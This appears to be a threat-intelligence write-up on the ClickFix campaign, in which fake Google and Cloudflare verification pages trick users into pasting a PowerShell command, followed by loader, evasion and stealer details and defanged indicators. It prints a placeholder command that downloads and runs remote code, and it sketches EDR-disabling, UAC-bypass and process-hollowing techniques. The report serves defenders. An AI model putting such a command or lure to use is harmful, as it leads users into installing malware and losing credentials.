ClickFix: Anatomy of a Cloudflare-Powered Social Engineering Campaign Using ResiLoader and BYOD Evasion

Threat actors are increasingly pivoting away from traditional exploit-based delivery in favor of highly convincing social engineering campaigns known as ClickFix. By meticulously mimicking the visual identity of trusted ecosystems—specifically Google and Cloudflare verification systems—attackers are successfully tricking users into manually facilitating their own system compromise. These campaigns serve as a delivery vehicle for a diverse array of high-impact malware families, including StealC, HijackLoader, NetSupport RAT, and several undocumented loaders.

Recent threat intelligence analysis suggests these campaigns have been maturing since late 2025. The primary objective is to bypass automated security controls by leveraging the “human element.” Instead of attempting to bypass a firewall via a software vulnerability, the attacker prompts the user to execute a PowerShell command, effectively turning the user into a manual execution engine for the malware.

The Anatomy of the Attack Chain

The initial stage involves redirecting victims to fraudulent “Verify you’re human” or “Manual Verification Required” landing pages. These pages are architected to replicate the UX of Google reCAPTCHA, Google Meet prompts, or Cloudflare security challenges. To maintain high availability and evade domain reputation filters, attackers utilize a combination of repurposed domains, compromised legitimate websites, and Cloudflare Pages (.pages.dev) infrastructure.

Once the user is convinced they are performing a legitimate security check, they are instructed to copy and execute a malicious command via a terminal or PowerShell prompt. A typical command payload follows this pattern:

powershell -c "iex(irm '{IP}:{Port}/{Path}')"

Forensic analysis has identified several active ports used in these communications, including 6600, 9900, 5506, 7895, 7493, 149, and 8442. Furthermore, some advanced iterations utilize the IClickFix framework to perform dynamic clipboard injection, making the attack even more seamless and harder for the user to detect.

ClickFix page mimicking trusted token sign-in
“New sign-in with trusted token” ClickFix lure (Source: Malwarebytes)

The “SECURITY GATEWAY” Framework and Payload Modularization

The infection mechanism is often driven by HTML templates containing obfuscated or plaintext PowerShell commands, such as the CustomCaptcha or the SECURITY GATEWAY framework. This framework is highly sophisticated, comprising modular components like GatewayRuntime, RemoteVault, and BeaconDispatcher. Notably, some variants feature an “approval gate,” which functions as a real-time C2 dashboard allowing attackers to select specific payloads based on the victim’s profile.

Google Meet audio driver lure
The “fix audio driver” Google Meet ClickFix lure (Source: Malwarebytes)

Lures are context-aware, ranging from fake Google login alerts and QR code generators to Google Meet “fix audio driver” prompts. For instance, an endpoint such as /api/driver-clipboard.php can dynamically return an OS-specific payload tailored to the victim’s machine.

Upon execution, the initial PowerShell downloader drops a script (e.g., tmpXXXX.tmp.ps1) into the local %TEMP% directory. This script establishes a foothold by creating C:\ProgramData\Zooms, then proceeds to fetch secondary-stage payloads from attacker-controlled IPs or Cloudflare R2 storage buckets. During this process, host data may be exfiltrated to endpoints like http://{IP}/dl-callback.

Observed Payload Mappings:

  • libEGL.zip: Delivers a trojanized Electron-based Franz application containing ResiLoader and StealC.
  • Test.msi: Deploys a Deno loader alongside a specialized PowerShell stealer.
  • arworks.zip: Delivers Amatera Stealer.
  • water-night.zip: Deploys Remus.
  • Setup.msi / Invintrum_first.msi: Installs NetSupport RAT.
  • traffic1.msi / ibrowser.exe: Deploys CastleLoader and a Rust-based stealer via DLL hijacking.

Advanced Evasion: ResiLoader and BYOD Techniques

A critical development in this campaign is the introduction of ResiLoader. Implemented as an obfuscated .NET NativeAOT DLL (msys-crypto-3.dll), it utilizes “Bring Your Own Driver” (BYOD) techniques. By leveraging the pcdhost.sys driver, the loader can disable over 140 individual AV/EDR processes, effectively blinding the host’s security stack.

ResiLoader secures persistence via the RUN registry key and the C:\ProgramData\Google Update directory. It further escalates privileges using the ICMLuaUtil COM interface for UAC bypass, eventually performing process hollowing to inject the StealC stealer into ServiceModelReg.exe.

QR Code ClickFix lure
“QR Code” ClickFix lure page (Source: Malwarebytes)

Technical Indicators of Compromise (IoCs)

Type Indicator / Value Notes
Malware ResiLoader DLL New .NET NativeAOT loader; uses pcdhost.sys for EDR evasion.
Hash 72907d0ca3258365838626f6a8d993a6 ResiLoader DLL sample.
Malware StealC Info-stealer via process hollowing into ServiceModelReg.exe.
Hash 0234E3188F2883A438B3F2BEAB7A78B2 StealC payload hash.
Malware NetSupport RAT Installed via MSI files.
Hash eee416efcb1e33f220cdb4b05496a07a NetSupport sample hash.
Infra onegeekworld[.]com, antibotv3[.]com Host fake verification pages.
Infra *.pages[.]dev (various subdomains) Cloudflare Pages used for lure hosting.
Infra pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev Cloudflare R2 payload storage.
Infra 151.240.151[.]126, 85.239.149[.]16 Active payload distribution IPs.

Note: All IP addresses and domains have been defanged (e.g., using [.]) to prevent accidental resolution.

Related Articles

Back to top button